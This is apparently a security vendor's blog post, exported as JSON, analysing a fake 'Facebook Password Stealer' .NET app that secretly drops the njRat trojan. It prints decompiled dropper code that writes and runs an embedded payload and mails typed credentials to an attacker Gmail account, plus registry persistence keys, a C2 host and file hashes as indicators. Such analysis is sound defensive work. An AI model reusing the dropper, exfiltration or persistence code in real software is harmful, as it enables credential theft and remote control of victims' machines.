{"id":1772,"date":"2024-09-25T06:47:31","date_gmt":"2024-09-25T06:47:31","guid":{"rendered":"https:\/\/xdr-mdr.lmntrix.com\/main_web\/?p=1772"},"modified":"2025-07-29T02:51:00","modified_gmt":"2025-07-29T02:51:00","slug":"instant-karma-facebook-password-stealer-app-drops-remote-access-trojan","status":"publish","type":"post","link":"https:\/\/lmntrix.com\/blog\/instant-karma-facebook-password-stealer-app-drops-remote-access-trojan\/","title":{"rendered":"Instant Karma: Facebook password stealer app drops Remote Access Trojan"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img fetchpriority=\"high\" decoding=\"async\" width=\"981\" height=\"489\" src=\"https:\/\/lmntrix.com\/blog\/wp-content\/uploads\/2024\/09\/k4.webp\" alt=\"\" class=\"wp-image-1792\"\/><\/figure>\n\n\n\n<p>Version:1.0 StartHTML:000000303 EndHTML:000026461 StartFragment:000007128 EndFragment:000026393 StartSelection:000007128 EndSelection:000026389 SourceURL:https:\/\/www.lmntrix.com\/Lab\/Lab_info.php?id=60&amp;url=Instant%20Karma:%20Facebook%20password%20stealer%20app%20drops%20Remote%20Access%20Trojan LMNTRIX Labs LMNTRIX Labs<\/p>\n\n\n\n<p>A new Facebook password stealer campaign is luring victims with the offer of hijacking Facebook password credentials. In a beautiful case of \u2018what goes around comes around\u2019, the application also drops malware in the background on the user\u2019s machine, opening the would-be snooper to having their own passwords stolen.<br><br>The LMNTRIX research team has analysed a sample, compiled using .NET compiler and successfully reversed. This post includes both code analysis and dynamic analysis of the sample.<br><br>File information<br><br>MD5: CD58EC76F8166E6CC9D58C84D39EE1D2<br><br>Size: 1913 KB<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" width=\"764\" height=\"107\" src=\"https:\/\/lmntrix.com\/blog\/wp-content\/uploads\/2024\/09\/k1.webp\" alt=\"\" class=\"wp-image-1786\"\/><\/figure>\n\n\n\n<p><em>Figure 1 Debug Information<\/em><\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" width=\"218\" height=\"58\" src=\"https:\/\/lmntrix.com\/blog\/wp-content\/uploads\/2024\/09\/k2.webp\" alt=\"\" class=\"wp-image-1794\"\/><\/figure>\n\n\n\n<p>(Facebook lookalike icon as resource of the file)<br><br>Debug detail shows that the file was created on 01 August 2017, with a PDB as Facebook password stealer. We detected the compiler as .NET compiler.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"505\" height=\"141\" src=\"https:\/\/lmntrix.com\/blog\/wp-content\/uploads\/2024\/09\/k3.webp\" alt=\"\" class=\"wp-image-1793\"\/><\/figure>\n\n\n\n<p><em>Figure 2 .Net Compiled file<\/em><br><br><strong>Strings Analysis<\/strong><br><br>\u2022&nbsp;&nbsp; &nbsp;000000002E84 &nbsp; 000000404C84 &nbsp; &nbsp; &nbsp;0 &nbsp; PictureBox2_Click_1<br><br>\u2022&nbsp;&nbsp; &nbsp;000000002EB3 &nbsp; 000000404CB3 &nbsp; &nbsp; &nbsp;0 &nbsp; get_Label1<br><br>\u2022&nbsp;&nbsp; &nbsp;000000002EBE &nbsp; 000000404CBE &nbsp; &nbsp; &nbsp;0 &nbsp; set_Label1<br><br>\u2022&nbsp;&nbsp; &nbsp;000000002EC9 &nbsp; 000000404CC9 &nbsp; &nbsp; &nbsp;0 &nbsp; get_Button1<br><br>\u2022&nbsp;&nbsp; &nbsp;000000002ED5 &nbsp; 000000404CD5 &nbsp; &nbsp; &nbsp;0 &nbsp; set_Button1<br><br>\u2022&nbsp;&nbsp; &nbsp;000000002EE1 &nbsp; 000000404CE1 &nbsp; &nbsp; &nbsp;0 &nbsp; get_ProgressBar1<br><br>\u2022&nbsp;&nbsp; &nbsp;000000002EF2 &nbsp; 000000404CF2 &nbsp; &nbsp; &nbsp;0 &nbsp; set_ProgressBar1<br><br>\u2022&nbsp;&nbsp; &nbsp;000000003B71 &nbsp; 000000405971 &nbsp; &nbsp; &nbsp;0 &nbsp; set_PasswordChar<br><br>\u2022&nbsp;&nbsp; &nbsp;000000003B82 &nbsp; 000000405982 &nbsp; &nbsp; &nbsp;0 &nbsp; m_AppObjectProvider<br><br>\u2022&nbsp;&nbsp; &nbsp;000000003B96 &nbsp; 000000405996 &nbsp; &nbsp; &nbsp;0 &nbsp; m_UserObjectProvider<br><br>\u2022&nbsp;&nbsp; &nbsp;000000003BAB &nbsp; 0000004059AB &nbsp; &nbsp; &nbsp;0 &nbsp; m_ComputerObjectProvider<br><br>\u2022&nbsp;&nbsp; &nbsp;000000003BC4 &nbsp; 0000004059C4 &nbsp; &nbsp; &nbsp;0 &nbsp; m_MyWebServicesObjectProvider<br><br>\u2022&nbsp;&nbsp; &nbsp;000000003BE2 &nbsp; 0000004059E2 &nbsp; &nbsp; &nbsp;0 &nbsp; m_MyFormsObjectProvider<br><br>\u2022&nbsp;&nbsp; &nbsp;000000003BFA &nbsp; 0000004059FA &nbsp; &nbsp; &nbsp;0 &nbsp; sender<br><br>\u2022&nbsp;&nbsp; &nbsp;000000003C01 &nbsp; 000000405A01 &nbsp; &nbsp; &nbsp;0 &nbsp; get_ResourceManager<br><br>\u2022&nbsp;&nbsp; &nbsp;000000003C15 &nbsp; 000000405A15 &nbsp; &nbsp; &nbsp;0 &nbsp; ComponentResourceManager<br><br>\u2022&nbsp;&nbsp; &nbsp;000000003C2E &nbsp; 000000405A2E &nbsp; &nbsp; &nbsp;0 &nbsp; Facebook Password Stealer<br><br>\u2022&nbsp;&nbsp; &nbsp;000000003C48 &nbsp; 000000405A48 &nbsp; &nbsp; &nbsp;0 &nbsp; m_FacebookPasswordStealer<br><br>\u2022&nbsp;&nbsp; &nbsp;000000003C62 &nbsp; 000000405A62 &nbsp; &nbsp; &nbsp;0 &nbsp; get_FacebookPasswordStealer<br><br>\u2022&nbsp;&nbsp; &nbsp;000000003C7E &nbsp; 000000405A7E &nbsp; &nbsp; &nbsp;0 &nbsp; set_FacebookPasswordStealer<br><br>The above strings deal with the buttons in the application and with the password stealer activity. From the above, we can see the buttons, resources and other details (like progress bar) that are part of the application interface. Drilling down further into the strings, we found more interesting functionality:&nbsp;<br><br>\u2022&nbsp;&nbsp; &nbsp;0000001DD353 &nbsp; 0000005E0B53 &nbsp; &nbsp; &nbsp;0 &nbsp;<br><br>\u2022&nbsp;&nbsp; &nbsp;0000001DD37B &nbsp; 0000005E0B7B &nbsp; &nbsp; &nbsp;0 &nbsp;<br><br>\u2022&nbsp;&nbsp; &nbsp;0000001DD3C6 &nbsp; 0000005E0BC6 &nbsp; &nbsp; &nbsp;0 &nbsp; &nbsp;<br><br>\u2022&nbsp;&nbsp; &nbsp;0000001DD408 &nbsp; 0000005E0C08 &nbsp; &nbsp; &nbsp;0 &nbsp; &nbsp;<br><br>\u2022&nbsp;&nbsp; &nbsp;0000001DD440 &nbsp; 0000005E0C40 &nbsp; &nbsp; &nbsp;0 &nbsp; &nbsp; &nbsp;<br><br>\u2022&nbsp;&nbsp; &nbsp;0000001DD450 &nbsp; 0000005E0C50 &nbsp; &nbsp; &nbsp;0 &nbsp; &nbsp; &nbsp; &nbsp;<br><br>\u2022&nbsp;&nbsp; &nbsp;0000001DD496 &nbsp; 0000005E0C96 &nbsp; &nbsp; &nbsp;0 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br><br>\u2022&nbsp;&nbsp; &nbsp;0000001DD739 &nbsp; 0000005E0F39 &nbsp; &nbsp; &nbsp;0 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br><br>\u2022&nbsp;&nbsp; &nbsp;0000001DD781 &nbsp; 0000005E0F81 &nbsp; &nbsp; &nbsp;0 &nbsp; &nbsp; &nbsp; &nbsp;<br><br>\u2022&nbsp;&nbsp; &nbsp;0000001DD79F &nbsp; 0000005E0F9F &nbsp; &nbsp; &nbsp;0 &nbsp; &nbsp; &nbsp;<br><br>\u2022&nbsp;&nbsp; &nbsp;0000001DD7B0 &nbsp; 0000005E0FB0 &nbsp; &nbsp; &nbsp;0 &nbsp; &nbsp;<br><br>\u2022&nbsp;&nbsp; &nbsp;0000001DD7C2 &nbsp; 0000005E0FC2 &nbsp; &nbsp; &nbsp;0 &nbsp; &nbsp;<br><br>\u2022&nbsp;&nbsp; &nbsp;0000001DD808 &nbsp; 0000005E1008 &nbsp; &nbsp; &nbsp;0 &nbsp; &nbsp; &nbsp;<br><br>\u2022&nbsp;&nbsp; &nbsp;0000001DD81B &nbsp; 0000005E101B &nbsp; &nbsp; &nbsp;0 &nbsp; &nbsp; &nbsp; &nbsp;<br><br>\u2022&nbsp;&nbsp; &nbsp;0000001DD91B &nbsp; 0000005E111B &nbsp; &nbsp; &nbsp;0 &nbsp; &nbsp; &nbsp; &nbsp;<br><br>\u2022&nbsp;&nbsp; &nbsp;0000001DD939 &nbsp; 0000005E1139 &nbsp; &nbsp; &nbsp;0 &nbsp; &nbsp; &nbsp; &nbsp;<br><br>\u2022&nbsp;&nbsp; &nbsp;0000001DD985 &nbsp; 0000005E1185 &nbsp; &nbsp; &nbsp;0 &nbsp; &nbsp; &nbsp; &nbsp;<br><br>\u2022&nbsp;&nbsp; &nbsp;0000001DD99F &nbsp; 0000005E119F &nbsp; &nbsp; &nbsp;0 &nbsp; &nbsp; &nbsp; &nbsp;<br><br>\u2022&nbsp;&nbsp; &nbsp;0000001DD9EB &nbsp; 0000005E11EB &nbsp; &nbsp; &nbsp;0 &nbsp; &nbsp; &nbsp; &nbsp;<br><br>\u2022&nbsp;&nbsp; &nbsp;0000001DDA05 &nbsp; 0000005E1205 &nbsp; &nbsp; &nbsp;0 &nbsp; &nbsp; &nbsp; &nbsp;<br><br>\u2022&nbsp;&nbsp; &nbsp;0000001DDA51 &nbsp; 0000005E1251 &nbsp; &nbsp; &nbsp;0 &nbsp; &nbsp; &nbsp; &nbsp;<br><br>\u2022&nbsp;&nbsp; &nbsp;0000001DDA6D &nbsp; 0000005E126D &nbsp; &nbsp; &nbsp;0 &nbsp; &nbsp; &nbsp; &nbsp;<br><br>\u2022&nbsp;&nbsp; &nbsp;0000001DDAB9 &nbsp; 0000005E12B9 &nbsp; &nbsp; &nbsp;0 &nbsp; &nbsp; &nbsp; &nbsp;<br><br>\u2022&nbsp;&nbsp; &nbsp;0000001DDAD4 &nbsp; 0000005E12D4 &nbsp; &nbsp; &nbsp;0 &nbsp; &nbsp; &nbsp; &nbsp;<br><br>\u2022&nbsp;&nbsp; &nbsp;0000001DDB20 &nbsp; 0000005E1320 &nbsp; &nbsp; &nbsp;0 &nbsp; &nbsp; &nbsp;<br><br>\u2022&nbsp;&nbsp; &nbsp;0000001DDB34 &nbsp; 0000005E1334 &nbsp; &nbsp; &nbsp;0 &nbsp; &nbsp;<br><br>Among them (above) was the fact this application seems to be tested for compatibility in the Windows environment while also checking for privileges and execution level. Malware programs focus their attack platform as they don\u2019t want to encounter any compatibility or privilege issues. In the above strings, we see a tag as \u2018supportedOS Id\u2019, this relates to application manifest. Windows introduces a section called \u2018Compatibility\u2019 in application manifest. This section helps Windows to determine if &nbsp;an application was designed to target a particular version, and enables Windows to provide the behaviour that the application expects based on the version of Windows that the application targeted. The Compatibility section allows Windows to provide new behaviour to new developer-created software while maintaining the compatibility for existing software. For example, an application declaring support only for Windows 7 in the Compatibility section will continue to receive Windows 7 behaviour in future version of Windows.&nbsp;<br><br>\u2022&nbsp;&nbsp; &nbsp;0000000043BB &nbsp; 0000004061BB &nbsp; &nbsp; &nbsp;0 &nbsp; Spoolsv<br><br>\u2022&nbsp;&nbsp; &nbsp;0000000043CB &nbsp; 0000004061CB &nbsp; &nbsp; &nbsp;0 &nbsp; japty0P7Q7RzorCRPhbJ5Q==<br><br>\u2022&nbsp;&nbsp; &nbsp;0000000043FD &nbsp; 0000004061FD &nbsp; &nbsp; &nbsp;0 &nbsp; Please check your network connection, then try again.<br><br>\u2022&nbsp;&nbsp; &nbsp;000000004469 &nbsp; 000000406269 &nbsp; &nbsp; &nbsp;0 &nbsp; vxv00500@gmail.com<br><br>\u2022&nbsp;&nbsp; &nbsp;00000000448F &nbsp; 00000040628F &nbsp; &nbsp; &nbsp;0 &nbsp; WNWivEhQUJvsIsX7+vly0A==<br><br>\u2022&nbsp;&nbsp; &nbsp;0000000044C1 &nbsp; 0000004062C1 &nbsp; &nbsp; &nbsp;0 &nbsp; zf18vFSzVQPAf2Z7\/tW\/ag==<br><br>\u2022&nbsp;&nbsp; &nbsp;0000000044F3 &nbsp; 0000004062F3 &nbsp; &nbsp; &nbsp;0 &nbsp; 0jEqvP4wcNAe+uwz6euyqa5WISA70v2p4bBuUxQmX70=<br><br>\u2022&nbsp;&nbsp; &nbsp;00000000454D &nbsp; 00000040634D &nbsp; &nbsp; &nbsp;0 &nbsp; GtHsJwshtDBQMnGsmRkleXq<br><br>\u2022&nbsp;&nbsp; &nbsp;000000004665 &nbsp; 000000406465 &nbsp; &nbsp; &nbsp;0 &nbsp; Your network settings are blocking party chat, please try again [0x807A103341]<br><br>\u2022&nbsp;&nbsp; &nbsp;000000004703 &nbsp; 000000406503 &nbsp; &nbsp; &nbsp;0 &nbsp; Please fill in the blanks<br><br>\u2022&nbsp;&nbsp; &nbsp;000000004737 &nbsp; 000000406537 &nbsp; &nbsp; &nbsp;0 &nbsp; PictureBox1.Image<br><br>\u2022&nbsp;&nbsp; &nbsp;00000000475B &nbsp; 00000040655B &nbsp; &nbsp; &nbsp;0 &nbsp; PictureBox1<br><br>\u2022&nbsp;&nbsp; &nbsp;000000004773 &nbsp; 000000406573 &nbsp; &nbsp; &nbsp;0 &nbsp; Marlett<br><br>\u2022&nbsp;&nbsp; &nbsp;000000004783 &nbsp; 000000406583 &nbsp; &nbsp; &nbsp;0 &nbsp; Label1<br><br>\u2022&nbsp;&nbsp; &nbsp;000000004791 &nbsp; 000000406591 &nbsp; &nbsp; &nbsp;0 &nbsp; Login Information:<br><br>\u2022&nbsp;&nbsp; &nbsp;0000000047B7 &nbsp; 0000004065B7 &nbsp; &nbsp; &nbsp;0 &nbsp; Label2<br><br>\u2022&nbsp;&nbsp; &nbsp;0000000047C5 &nbsp; 0000004065C5 &nbsp; &nbsp; &nbsp;0 &nbsp; Facebook Email:<br><br>\u2022&nbsp;&nbsp; &nbsp;0000000047E5 &nbsp; 0000004065E5 &nbsp; &nbsp; &nbsp;0 &nbsp; Label3<br><br>\u2022&nbsp;&nbsp; &nbsp;0000000047F3 &nbsp; 0000004065F3 &nbsp; &nbsp; &nbsp;0 &nbsp; Password:<br><br>\u2022&nbsp;&nbsp; &nbsp;000000004807 &nbsp; 000000406607 &nbsp; &nbsp; &nbsp;0 &nbsp; PictureBox2.Image<br><br>\u2022&nbsp;&nbsp; &nbsp;00000000482B &nbsp; 00000040662B &nbsp; &nbsp; &nbsp;0 &nbsp; PictureBox2<br><br>\u2022&nbsp;&nbsp; &nbsp;000000004843 &nbsp; 000000406643 &nbsp; &nbsp; &nbsp;0 &nbsp; Label4<br><br>\u2022&nbsp;&nbsp; &nbsp;000000004851 &nbsp; 000000406651 &nbsp; &nbsp; &nbsp;0 &nbsp; Target Information:<br><br>\u2022&nbsp;&nbsp; &nbsp;000000004879 &nbsp; 000000406679 &nbsp; &nbsp; &nbsp;0 &nbsp; Label5<br><br>\u2022&nbsp;&nbsp; &nbsp;000000004887 &nbsp; 000000406687 &nbsp; &nbsp; &nbsp;0 &nbsp; URL\/Email:<br><br>\u2022&nbsp;&nbsp; &nbsp;00000000489D &nbsp; 00000040669D &nbsp; &nbsp; &nbsp;0 &nbsp; ProgressBar1<br><br>\u2022&nbsp;&nbsp; &nbsp;0000000048B7 &nbsp; 0000004066B7 &nbsp; &nbsp; &nbsp;0 &nbsp; Button1<br><br>The above strings contain email id \u2013 possibly attacker\u2019s email \u2013 facebook email box, password box, progress bar and url box (facebook user id link). Unbeknownst to the user, these boxes are used to collect the data entered. For instance, \u2018label1\u2019 is login information, \u2018label2\u2019 is Facebook Email, and \u2018label3\u2019 is password \u2013 all details which are collected by attacker.&nbsp;<br><br><strong>Code Analysis<\/strong><br><br>\/\/ WindowsApplication5.FacebookPasswordStealer<br><br>private void Button1_Click(object sender, EventArgs e)<br><br>{<br><br>&nbsp;&nbsp; &nbsp;checked<br><br>&nbsp;&nbsp; &nbsp;{<br><br>&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;this.$STATIC$Button1_Click$20211C12809D$hot++;<br><br>&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;bool flag = this.$STATIC$Button1_Click$20211C12809D$hot == 1;<br><br>&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;if (flag)<br><br>&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;{<br><br>&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;string temp = MyProject.Computer.FileSystem.SpecialDirectories.Temp;<br><br>&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;string text = Conversions.ToString(Operators.AddObject(temp, this.YeQPUvDjsvooMFQsZNIvkUb(&#8220;japty0P7Q7RzorCRPhbJ5Q==&#8221;)));<br><br>&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;File.WriteAllBytes(text, Resources.Spoolsv);<br><br>&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;Process.Start(text);<br><br>&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;}<br><br>&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;bool flag2 = !MyProject.Computer.Network.IsAvailable;<br><br>&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;if (flag2)<br><br>&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;{<br><br>&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;MessageBox.Show(&#8220;Please check your network connection, then try again.&#8221;);<br><br>&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;}<br><br>&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;else<br><br>&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;{<br><br>&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;bool flag3 = this.TextBox1.Text.Length &gt; 0 &amp; this.TextBox2.Text.Length &gt; 0 &amp; this.TextBox3.Text.Length &gt; 0;<br><br>&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;if (flag3)<br><br>&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;{<br><br>&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;this.Timer1.Start();<br><br>&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;MailMessage mailMessage = new MailMessage();<br><br>&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;try<br><br>&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;{<br><br>&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;mailMessage.From = new MailAddress(&#8220;vxv00500@gmail.com&#8221;);<br><br>&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;mailMessage.To.Add(&#8220;vxv00500@gmail.com&#8221;);<br><br>&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;mailMessage.Subject = this.TextBox1.Text;<br><br>&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;mailMessage.Body = this.TextBox2.Text;<br><br>&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;new SmtpClient(Conversions.ToString(this.YeQPUvDjsvooMFQsZNIvkUb(&#8220;WNWivEhQUJvsIsX7+vly0A==&#8221;)))<br><br>&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;{<br><br>&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;Port = 587,<br><br>&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;EnableSsl = true,<br><br>&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;Credentials = new NetworkCredential(&#8220;vxv00500@gmail.com&#8221;, Conversions.ToString(this.YeQPUvDjsvooMFQsZNIvkUb(&#8220;zf18vFSzVQPAf2Z7\/tW\/ag==&#8221;)))<br><br>&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;}.Send(mailMessage);<br><br>This code corresponds to the mentioned strings. In the above code, we find a process \u2018start\u2019 which contains a resource named \u2018Spoolsv\u2019. Let us check this line:<\/p>\n\n\n\n<p>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; &nbsp;File.WriteAllBytes(text, Resources.Spoolsv);<\/p>\n\n\n\n<p>&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;Process.Start(text);<\/p>\n\n\n\n<p>The \u2018WriteAllBytes\u2019 function is used to create a new file, suppose the file always existed and will be overwritten. Spoolsv will be launched as a new process which is the entry point for njRat Malware to be dropped on the computer. The code also shows us that by clicking \u2018button1\u2019, the njRat sample ill also be dropped.<br><br>We can also see that a check is made for network connection availability. If no connection is present, a message box reading &#8220;Please check your network connection, then try again&#8221; will appear.&nbsp;<br><br>If the network connection is present then \u2018this.Timer1.start()\u2019 contains mail a message which is trying to reach the mail address &#8220;vxv00500@gmail.com&#8221; with a subject line matching the entry for \u2018TextBox1\u2019 and the body matching the entry in \u2018TextBox2\u2019. Further, an SMTP client using port 587 and enablessl with the same email id as network credential will also send the mail message. The following code represents the above mentioned description.<\/p>\n\n\n\n<p>EnableSsl = true,<\/p>\n\n\n\n<p>Credentials = new NetworkCredential(&#8220;vxv00500@gmail.com&#8221;, Conversions.ToString(this.YeQPUvDjsvooMFQsZNIvkUb(&#8220;zf18vFSzVQPAf2Z7\/tW\/ag==&#8221;)))<\/p>\n\n\n\n<p>}.Send(mailMessage);<\/p>\n\n\n\n<p><strong>Dynamic Analysis<\/strong>&nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img fetchpriority=\"high\" decoding=\"async\" width=\"981\" height=\"489\" src=\"https:\/\/lmntrix.com\/blog\/wp-content\/uploads\/2024\/09\/k4.webp\" alt=\"\" class=\"wp-image-1792\"\/><\/figure>\n\n\n\n<p><em>Figure 3 Facebook Password Stealer &#8211; After Execution<\/em><br><br>This sample shows the above behaviour after the execution. As seen in the strings and codes of the file, we observed the same behaviour after execution of the file.&nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"493\" height=\"327\" src=\"https:\/\/lmntrix.com\/blog\/wp-content\/uploads\/2024\/09\/k5.webp\" alt=\"\" class=\"wp-image-1791\"\/><\/figure>\n\n\n\n<p><em>Figure 4 Test details as input data<\/em><br><br>We submitted random test data into the boxes and hit the button \u2018hack\u2019.&nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"907\" height=\"495\" src=\"https:\/\/lmntrix.com\/blog\/wp-content\/uploads\/2024\/09\/k6.webp\" alt=\"\" class=\"wp-image-1790\"\/><\/figure>\n\n\n\n<p><em>Figure 5 after clicking Hack button<\/em><br><br>After clicking the \u2018hack\u2019 button, we see the file drop another sample called \u2018spoolsvfax.exe\u2019 in the \u2018alluser\u2019 folder location.&nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"188\" height=\"78\" src=\"https:\/\/lmntrix.com\/blog\/wp-content\/uploads\/2024\/09\/k7.webp\" alt=\"\" class=\"wp-image-1789\"\/><\/figure>\n\n\n\n<p><em>(Dropped file)<\/em><br><br>&nbsp;<\/p>\n\n\n\n<p>We checked this sample against VirusTotal for the hash and file, and found it was uploaded within the past week with MSIL hits:<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"633\" height=\"621\" src=\"https:\/\/lmntrix.com\/blog\/wp-content\/uploads\/2024\/09\/k8.webp\" alt=\"\" class=\"wp-image-1788\"\/><\/figure>\n\n\n\n<p>Figure 6 Dropped file &#8211; MSIL hit<br><br>This file is njRat sample.<\/p>\n\n\n\n<p>&nbsp;HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run &#8220;a7955038719e1a085653c9c41bba68d8&#8221;<\/p>\n\n\n\n<p>&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;Type: REG_SZ<\/p>\n\n\n\n<p>&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;Data: &#8220;C:\\Documents and Settings\\All Users\\spoolsvfax.exe&#8221;<\/p>\n\n\n\n<p>&nbsp;&nbsp; &nbsp;HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run &#8220;a7955038719e1a085653c9c41bba68d8&#8221;<\/p>\n\n\n\n<p>&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;Type: REG_SZ<\/p>\n\n\n\n<p>&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;Data: &#8220;C:\\Documents and Settings\\All Users\\spoolsvfax.exe&#8221;<\/p>\n\n\n\n<p>Run entries are also created for this njRat (dropped sample) to keep persistence with a duplicate sample dropped in the local settings folder:<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"461\" height=\"237\" src=\"https:\/\/lmntrix.com\/blog\/wp-content\/uploads\/2024\/09\/k9.webp\" alt=\"\" class=\"wp-image-1787\"\/><\/figure>\n\n\n\n<p><em>Figure 7 Duplicate sample of njRat<\/em><br><br><strong>Command control and campaign details of the njRat:<\/strong><br><br>C2: bigbossh.ddns[.]net:1177<br><br><strong>IOC Details<\/strong><br><br>Registry check-&nbsp;<br><br>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run &#8220;a7955038719e1a085653c9c41bba68d8&#8221;<br><br>Data: &#8220;C:\\Documents and Settings\\All Users\\spoolsvfax.exe&#8221;<br><br>HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run &#8220;a7955038719e1a085653c9c41bba68d8&#8221;<br><br>Data: &#8220;C:\\Documents and Settings\\All Users\\spoolsvfax.exe&#8221;<br><br>HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile\\AuthorizedApplications\\List &#8220;C:\\Documents and Settings\\All Users\\spoolsvfax.exe&#8221;<br><br>Data: C:\\Documents and Settings\\All Users\\spoolsvfax.exe:*:Enabled:spoolsvfax.exe<br><br>HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile\\AuthorizedApplications\\List &#8220;C:\\Documents and Settings\\All Users\\spoolsvfax.exe&#8221;<br><br>Data: C:\\Documents and Settings\\All Users\\spoolsvfax.exe:*:Enabled:spoolsvfax.exe<br><br>File check-<br><br>C:\\Documents and Settings\\All Users\\spoolsvfax.exe<br><br>c:\\Documents and Settings\\current user\\Local Settings\\TempSpoolsv.exe<br><br>The above files are dropped file and these files are same file (same MD5). MD5 of the file is 2A6661E2273E771D84B4B1529BCBC826.<br><br><strong>CNC- bigbossh.ddns[.]net:1177<br><br>Conclusion<\/strong><br><br>If you\u2019re downloading an application to steal other people\u2019s passwords, perhaps having a Remote Access Trojan dropped on your machine in the process is a sign of cosmic justice. When you see a suspicious app, really consider whether or not you need it because these apps commonly have nasty little surprises lurking in the code.&nbsp;<br><br>&nbsp;<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Version:1.0 StartHTML:000000303 EndHTML:000026461 StartFragment:000007128 EndFragment:000026393 StartSelection:000007128 EndSelection:000026389 